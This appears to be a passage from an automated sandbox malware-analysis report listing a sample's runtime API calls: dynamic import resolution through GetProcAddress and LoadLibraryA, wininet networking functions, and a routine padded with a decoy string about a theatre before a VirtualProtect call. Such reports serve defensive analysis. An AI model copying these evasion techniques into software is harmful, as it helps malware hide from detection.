                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007A01B8), ref: 0041A124
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007A01E8), ref: 0041A13C
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007A01D0), ref: 0041A154
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,00794640), ref: 0041A16D
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007A0200), ref: 0041A185
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007A0218), ref: 0041A19D
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007A0230), ref: 0041A1B6
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079FF30), ref: 0041A1CE
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007A0068), ref: 0041A1E6
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007A00E0), ref: 0041A1FF
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007A00C8), ref: 0041A217
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007A00F8), ref: 0041A22F
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007A0080), ref: 0041A248
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,00798D70), ref: 0041A260
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007A0020), ref: 0041A278
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,0079FF78), ref: 0041A291
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007947A0), ref: 0041A2A9
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007A0128), ref: 0041A2C1
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,00794660), ref: 0041A2DA
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007A0110), ref: 0041A2F2
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007A0038), ref: 0041A30A
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007947C0), ref: 0041A323
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75900000,007947E0), ref: 0041A33B
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(007A0140,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A34D
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(0079FF90,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A35E
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(0079FFA8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A370
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(0079FFC0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A382
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(007A0158,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A393
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(0079FEE8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3A5
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(0079FF18,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3B7
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(0079FEA0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3C8
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75FD0000,00794800), ref: 0041A3EA
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75FD0000,0079FFF0), ref: 0041A402
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75FD0000,0079D7D8), ref: 0041A41A
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75FD0000,007A0170), ref: 0041A433
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75FD0000,00794C00), ref: 0041A44B
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6FDC0000,00799240), ref: 0041A470
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6FDC0000,00794B60), ref: 0041A489
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6FDC0000,00799498), ref: 0041A4A1
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6FDC0000,007A0188), ref: 0041A4B9
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6FDC0000,007A00B0), ref: 0041A4D2
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6FDC0000,00794A60), ref: 0041A4EA
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6FDC0000,00794AA0), ref: 0041A502
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6FDC0000,0079FF00), ref: 0041A51B
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(763B0000,00794CE0), ref: 0041A53C
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(763B0000,00794C80), ref: 0041A554
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(763B0000,007A0050), ref: 0041A56D
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(763B0000,007A0098), ref: 0041A585
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(763B0000,00794C60), ref: 0041A59D
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(750F0000,00799290), ref: 0041A5C3
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(750F0000,00799420), ref: 0041A5DB
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(750F0000,0079FFD8), ref: 0041A5F3
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(750F0000,00794D40), ref: 0041A60C
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(750F0000,00794CA0), ref: 0041A624
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(750F0000,007992B8), ref: 0041A63C
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A50000,0079FEB8), ref: 0041A662
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A50000,00794A00), ref: 0041A67A
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A50000,0079D748), ref: 0041A692
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A50000,0079FF48), ref: 0041A6AB
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A50000,0079FED0), ref: 0041A6C3
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A50000,00794BC0), ref: 0041A6DB
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A50000,00794C40), ref: 0041A6F4
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A50000,007A0008), ref: 0041A70C
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A50000,0079FF60), ref: 0041A724
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75070000,00794CC0), ref: 0041A746
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75070000,007A04D0), ref: 0041A75E
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75070000,007A0440), ref: 0041A776
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75070000,007A0458), ref: 0041A78F
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75070000,007A0308), ref: 0041A7A7
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74E50000,00794B00), ref: 0041A7C8
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74E50000,00794D00), ref: 0041A7E1
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75320000,00794D20), ref: 0041A802
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75320000,007A02A8), ref: 0041A81A
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F060000,00794DA0), ref: 0041A840
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F060000,00794D60), ref: 0041A858
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F060000,00794B20), ref: 0041A870
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F060000,007A0320), ref: 0041A889
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F060000,00794BE0), ref: 0041A8A1
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F060000,00794AC0), ref: 0041A8B9
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F060000,00794B40), ref: 0041A8D2
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F060000,00794D80), ref: 0041A8EA
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0041A901
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0041A917
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74E00000,007A0548), ref: 0041A939
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74E00000,0079D688), ref: 0041A951
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74E00000,007A0338), ref: 0041A969
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74E00000,007A0518), ref: 0041A982
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DF0000,00794C20), ref: 0041A9A3
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F9C0000,007A02C0), ref: 0041A9C4
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F9C0000,00794A80), ref: 0041A9DD
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F9C0000,007A03E0), ref: 0041A9F5
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F9C0000,007A0488), ref: 0041AA0D
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                                                  • String ID: Ky$ Ly$ My$@Fy$@Hy$@Ky$@Ly$@My$HttpQueryInfoA$InternetSetOptionA$`Fy$`Hy$`Jy$`Ky$`Ly$`My$Gy$Iy$Ky$Ly
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2238633743-1381883742
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fc853244e6edf76f870e234c3061c456cb9d9aaab695e8dd72f65461d71d1d70
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98623EB5D1B2549FC344DFA8FC8895677BBA78D301318A61BF909C3674E734A640CB62
                                                                                                                                                                                                                                                                                                                                  Function 00404610 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114stringmemoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040461C
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404627
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404632
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040463D
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404648
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,00416C9B), ref: 00404657
                                                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,00416C9B), ref: 0040465E
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040466C
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404677
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404682
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040468D
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404698
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046AC
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046B7
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046C2
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046CD
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046D8
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404701
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040470C
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404717
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404722
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472D
                                                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 00404740
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404768
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404773
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040477E
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404789
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404794
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047A4
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047AF
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047BA
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047C5
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047D0
                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004047EC
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404693
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046A7
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047B5
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040467D
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404779
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040479F
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046FC
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040476E
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047C0
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404667
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404688
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047AA
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040478F
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047CB
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404728
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471D
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C8
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404784
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B2
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404672
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404763
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404712
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D3
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404707
                                                                                                                                                                                                                                                                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046BD
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
